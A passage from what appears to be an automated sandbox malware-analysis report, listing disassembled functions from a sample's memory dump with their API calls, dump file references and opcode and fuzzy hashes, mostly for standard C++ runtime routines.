                                                                      • Opcode Fuzzy Hash: 52febe46b16e39be5e9a1a0b7cabde91443f93228eb48f37872e2abe919af76a
                                                                      • Instruction Fuzzy Hash: 0FD159B5D04648DFCB15CFA8D880AEDBBB5FF49300F28456AE856EB351D730A946CB60
                                                                      Function 00D88872 Relevance: 6.3, APIs: 4, Instructions: 313COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 3eaddabe75bd379f844137d4ecb93d00871002781e040ba9ebd2ed9f1d446380
                                                                      • Instruction ID: 790eacfcab838f25d4556219affe6be028f9795dfd90c42c477a537570943de1
                                                                      • Opcode Fuzzy Hash: 3eaddabe75bd379f844137d4ecb93d00871002781e040ba9ebd2ed9f1d446380
                                                                      • Instruction Fuzzy Hash: 3DC14B71900249DFDF19EF98C985AEEBBB9FF48310F64401AE805A7251DB30AE45DBB1
                                                                      Function 00D82A16 Relevance: 6.3, APIs: 4, Instructions: 310COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                      • String ID:
                                                                      • API String ID: 838279627-0
                                                                      • Opcode ID: 621b41520a8c16b1c0be6c18ae63677bbd25e95f89390577abff788d9b1e78e9
                                                                      • Instruction ID: 962ae3e691d89066893bfff7091f6c1461879154b087ce635da78df47d61fe1f
                                                                      • Opcode Fuzzy Hash: 621b41520a8c16b1c0be6c18ae63677bbd25e95f89390577abff788d9b1e78e9
                                                                      • Instruction Fuzzy Hash: E7C15C71900249EFDF15EFA8C981AFEBBB9EF48310F14451AE805AB255D730AE45CBB1
                                                                      Function 00D94F20 Relevance: 6.3, APIs: 4, Instructions: 277COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D94F27
                                                                      • collate.LIBCPMT ref: 00D94F33
                                                                        • Part of subcall function 00D93E70: __EH_prolog3_GS.LIBCMT ref: 00D93E77
                                                                        • Part of subcall function 00D93E70: __Getcoll.LIBCPMT ref: 00D93EDB
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • __Getcoll.LIBCPMT ref: 00D94F76
                                                                        • Part of subcall function 00D93CD4: __EH_prolog3.LIBCMT ref: 00D93CDB
                                                                        • Part of subcall function 00D93CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00D93CE5
                                                                        • Part of subcall function 00D93CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00D93D56
                                                                        • Part of subcall function 00D84403: __EH_prolog3.LIBCMT ref: 00D8440A
                                                                        • Part of subcall function 00D84403: std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                        • Part of subcall function 00D84403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • numpunct.LIBCPMT ref: 00D951A6
                                                                        • Part of subcall function 00D784C0: LocalAlloc.KERNEL32(00000040,00000000,00D9839D,00000000,862265DA,?,00000000,?,00000000,?,00DBCB8D,000000FF,?,00D717D5,00000000,00DBD3BA), ref: 00D784C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                      • String ID:
                                                                      • API String ID: 2732324234-0
                                                                      • Opcode ID: 4359ad990d4e3909d6515cdc82977122d7a526f60ebd97d5abef5145afe0a8d4
                                                                      • Instruction ID: 50fb424da9c5961688f8e5284009274da8c555de6c5483a3321ed0280b1564b5
                                                                      • Opcode Fuzzy Hash: 4359ad990d4e3909d6515cdc82977122d7a526f60ebd97d5abef5145afe0a8d4
                                                                      • Instruction Fuzzy Hash: DB91D671900712ABDF21AB759806B7F7AA9EF41360F15852EF849A7346EF70890087F1
                                                                      Function 00D9AFD5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: 6072a8d19557620ac795c686f60c2d85f1d8e8368f97596a00913198da981cc8
                                                                      • Instruction ID: 0f246aa2e34e6b3ea08248eef2a1be5aafe904c84adccf945f7b28da456e3f51
                                                                      • Opcode Fuzzy Hash: 6072a8d19557620ac795c686f60c2d85f1d8e8368f97596a00913198da981cc8
                                                                      • Instruction Fuzzy Hash: E851C372601302AFDF258F14EA51B6A77A4FF41720F1A452EEC5A97291E731EC40D7B0
                                                                      Function 00DA7B18 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e470bb95c3f34493103a2d238da4cb4ebb341420b57bcf5e2c1038790a05685
                                                                      • Instruction ID: af825b01c4cb5a9b0d341ceb6077eb2a0671e2ba6859adcb1c9fae95465d31d5
                                                                      • Opcode Fuzzy Hash: 6e470bb95c3f34493103a2d238da4cb4ebb341420b57bcf5e2c1038790a05685
                                                                      • Instruction Fuzzy Hash: 69216DB2608205AFDB20AF75CC41D6B7BA9EF423A47148925F955D7652EB31EC40C7B0
                                                                      Function 00D79020 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,00000000,76B15490,00D78B3A,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D79027
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                      • API String ID: 1452528299-1781106413
                                                                      • Opcode ID: 9ee7693641a3507077bfb5736453dd5a5eadd7e0674066a3730e8100d7bf0cdc
                                                                      • Instruction ID: 3ea310c7eb6f007d98e60699e9725c0faf408b5f9301aef016526a13b6979b74
                                                                      • Opcode Fuzzy Hash: 9ee7693641a3507077bfb5736453dd5a5eadd7e0674066a3730e8100d7bf0cdc
                                                                      • Instruction Fuzzy Hash: 80216A4AA2026286CB341F288416739A2F0EF54765F28442FE88DC7394FA698C81D3A1
                                                                      Function 00D84403 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8440A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00D844C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                      • String ID:
                                                                      • API String ID: 4244582100-0
                                                                      • Opcode ID: 8f1a72f825a49d08a1961b73fb9d91a4f03c8e345a76b854bd56407014b71e9b
                                                                      • Instruction ID: 37ad4d142926608b61791baf7b091da29298a39d161402747f7e5d19a1f81a61
                                                                      • Opcode Fuzzy Hash: 8f1a72f825a49d08a1961b73fb9d91a4f03c8e345a76b854bd56407014b71e9b
                                                                      • Instruction Fuzzy Hash: 31214C34A00616DFCB04EF18C891A6CB761FF45720F04855AE9169B3A1DF70ED10CFA4
                                                                      Function 00D81400 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,862265DA), ref: 00D8143C
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D8145C
                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D8148D
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00D814A6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                      • String ID:
                                                                      • API String ID: 3604237281-0
                                                                      • Opcode ID: 961f648b5b94b2ac89eeec0571cb53ec0baa6f7eb8d338cacd0ea916505a3a95
                                                                      • Instruction ID: 371c2c6ecb7a077948667dd68bef15020f51e2fdc48129c93afbd26b1d5e7e81
                                                                      • Opcode Fuzzy Hash: 961f648b5b94b2ac89eeec0571cb53ec0baa6f7eb8d338cacd0ea916505a3a95
                                                                      • Instruction Fuzzy Hash: 7E218174941319EFD7209F54DC0AFAABBB8EB05B24F10421AF511EB3C0D7B45A05CBA4
                                                                      Function 00D880C5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D880CC
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D880D6
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D88127
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D88147
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 5d3fc832bd7c8878af44da63b8659a889444b3d73d62b9a8a64c2bf372ae60b1
                                                                      • Instruction ID: b22bf961568e6c1e810202f20fbbf642ce7d0e8bd9daf87cf1e0f8647d0085de
                                                                      • Opcode Fuzzy Hash: 5d3fc832bd7c8878af44da63b8659a889444b3d73d62b9a8a64c2bf372ae60b1
                                                                      • Instruction Fuzzy Hash: ED01C075940359DBCF01FB64D8466AE7762EF80720F68440AE415AB391EF709E029BB0
                                                                      Function 00D881EF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D881F6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D88200
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D88251
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D88271
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 3b21467cb427c33200691fffe8dea2e0e76982ec2e2f847f6d5c65548ac8191f
                                                                      • Instruction ID: ea13ab3abc570f5f28a1d531c0c83e8a380a0c66c11993fa22dacf099ac18fdd
                                                                      • Opcode Fuzzy Hash: 3b21467cb427c33200691fffe8dea2e0e76982ec2e2f847f6d5c65548ac8191f
                                                                      • Instruction Fuzzy Hash: 8701C075900619CBCF01FBA4D8067ADB761EF80720F29440AE811AB391EF709E019BB4
                                                                      Function 00D8815A Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D88161
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8816B
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D881BC
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D881DC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: d416fec07020b60f4105fbb8779faab84cddb567bd570c2f3465c672c5e5fb0a
                                                                      • Instruction ID: 9a6aeda7fbecaf3c67fbcc2ec608b302bb02f48a9021d5a74a77370465f63115
                                                                      • Opcode Fuzzy Hash: d416fec07020b60f4105fbb8779faab84cddb567bd570c2f3465c672c5e5fb0a
                                                                      • Instruction Fuzzy Hash: 0301C035900719DBCB01FBA4D8466BE77A1EF84720F68450AF411AB391EF709E029BB0
                                                                      Function 00D826F9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D82700
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8270A
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D8275B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8277B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 004fccb6ec3ced7f571f9192597cf2a5c39a1a98bf1ac6223a6630975c3ff232
                                                                      • Instruction ID: a32c1f8c5859387a9225139f15f735e55392da436d23008e2d64c988dfe2079d
                                                                      • Opcode Fuzzy Hash: 004fccb6ec3ced7f571f9192597cf2a5c39a1a98bf1ac6223a6630975c3ff232
                                                                      • Instruction Fuzzy Hash: 8C01C075900219DBCB01FBA4D8066BD77A1EF84720F28410AE410AB391EF709E01ABB0
                                                                      Function 00D8278E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D82795
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D8279F
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D827F0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D82810
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 0c711dc5d6244387f3c8fdb7a61664e4c74805748b7057e0c312c50849ac5bf5
                                                                      • Instruction ID: 747a05c8ca10b0b1df123dc4e73be285f2e19ebe0d6173b00453f0c7786a0c89
                                                                      • Opcode Fuzzy Hash: 0c711dc5d6244387f3c8fdb7a61664e4c74805748b7057e0c312c50849ac5bf5
                                                                      • Instruction Fuzzy Hash: A5019275900259DBCF05FB64E8066BE77B5EF80720F28450AF415AB391EF749E019BB1
                                                                      Function 00D879C9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D879D0
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D879DA
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87A2B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87A4B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: a61aa68e30ea48733240120e89ff8537e7df4061dc77ced7f33254e41f8e48b7
                                                                      • Instruction ID: 06b98894f24426d7218527dec1a792d9acfc95a94ec7ca0e0301345a04e80d8e
                                                                      • Opcode Fuzzy Hash: a61aa68e30ea48733240120e89ff8537e7df4061dc77ced7f33254e41f8e48b7
                                                                      • Instruction Fuzzy Hash: C201D235904219DBCF05FB64E8466AE7B65EF80720F28440EF528AB391EF70DE018BB0
                                                                      Function 00D939EB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D939F2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D939FC
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93A4D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93A6D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 52401a8fe9ec0831b19fe83e0a61e1dcb1a6e27c9fc68373336c27b0209665c4
                                                                      • Instruction ID: 0f0d632164b6967dbcecb467e5fa5960f2b6cad75e475c692f97a8e4431adea4
                                                                      • Opcode Fuzzy Hash: 52401a8fe9ec0831b19fe83e0a61e1dcb1a6e27c9fc68373336c27b0209665c4
                                                                      • Instruction Fuzzy Hash: 6901AD759002199BCF01EBA4D8066AD7B61EF80720F29400AE415AB391EF70DF018BB1
                                                                      Function 00D87AF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87AFA
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87B04
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87B55
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87B75
                                                                      Memory Dump Source
